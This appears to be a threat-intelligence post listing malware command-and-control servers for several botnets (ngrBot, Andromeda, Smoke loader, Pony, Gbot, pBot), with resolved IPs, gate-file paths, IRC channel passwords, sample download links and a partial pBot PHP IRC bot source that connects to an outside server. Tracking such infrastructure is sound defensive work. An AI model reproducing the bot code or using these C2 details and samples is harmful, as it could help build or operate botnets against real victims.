Resolved mywebst0rage.info to 37.221.163.131 Server: mywebst0rage.info Gate file: /admin/hippo/image.php Hosting infos: http://whois.domaintools.com/37.221.163.131
208.117.34.145(ngrBot hosted in United States Chicago Steadfast Networks)
Server: 208.117.34.145:1887 Server:185.12.14.131:1887 Username: eyaimlr Nickname: n{DE|XPa}eyaimlr Channel: #bon2 (Password: speedd) Channeltopic: :~pu hxxp://www.sendspace.com/pro/dl/ppbf96 26bc0e7256f2a7fb536bdd19e0464e49 ~s -o ~s Download URLs hxxp://69.31.136.17/dlpro/29c185ae59e68f635192223e650939a3/50fe994c/ppbf96/mariayonosy.exe (fs03n5.sendspace.com) hosting infos: http://whois.domaintools.com/208.117.34.145
voscomptesenligne.eu (Andromeda http botnet hosted by iws.co)
Resolved voscomptesenligne.eu to 91.223.82.179 Server: voscomptesenligne.eu Gate file: /joomla/image.php Plugins Rootkit: http://voscomptesenligne.eu/joomla/r.pack Formgrabber: http://voscomptesenligne.eu/joomla/f.pack Gate file: /joomla/fg.php http://whois.domaintools.com/91.223.82.179
105mb samples
This package contains irc bots.banking trojans,rootkits and other samples Only for analysing purposes Source Source
imageshoster.ru (Smoke loader http botnet hosted by santrex.net)
Resolved imageshoster.ru to 46.166.169.187 Server: imageshoster.ru Gate file: /pics/index.php This is the new smokebot domain of the beerpigfarm.ru installs guy. His previously domain adzu324nbasmdaoias.su is currently hosted on the same server. Sample: hxxp://46.166.177.120/smo Hosting infos: http://whois.domaintools.com/46.166.169.187
fuelcw.org (Pony loader hosted by ihc.ru)
Resolved fuelcw.org to 37.143.9.173 Server: fuelcw.org Gate file: /ios.php http://whois.domaintools.com/37.143.9.173
ugctrust.com (Andromeda http botnet hosted by prohost.kg)
Resolved ugctrust.com to 91.213.233.156 Server: ugctrust.com Gate file: /image.php Sample was discovered by unixfreaxjp. hosting infos: http://whois.domaintools.com/91.213.233.156
kiz.no-ip.biz (Pony loader hosted by vmbox.co)
Resolved kiz.no-ip.biz to 94.242.238.213 Server: kiz.no-ip.biz Gate file: /xen/ride/gate.php Hosting infos: http://whois.domaintools.com/94.242.238.213
irc.by(Linux pBots hosted in Netherlands Netrc Llc)
Resolved : [irc.by] To [91.214.111.26] Here is the pBot: <!-- set_time_limit(0); error_reporting(0); class pBot { var config = array("server"=>"irc.by", "port"=>6669, "pass"=>"fx", "prefix"=>"fvox", "maxrand"=>8, "chan"=>"#webs", "key"=>"", "modes"=>"+iB-x", "password"=>"webs", "trigger"=>".", "hostauth"=>"Click.Here.To.Install.These.Updates" // * for any hostname ); var users = array(); function start() { if(!(this->conn = fsockopen(this->config['server'],this->config['port'],e,s,30))) this->start(); ident = ""; alph = range("a","z"); for(i=0;i<this->config['maxrand'];i++) ident .=Read more...
othar.tk (Gbot http bot hosted by mchost.ru)
Resolved othar.tk to 178.208.80.88 Server: othar.tk Gate file: //getcmd.php Hosting infos: http://whois.domaintools.com/178.208.80.88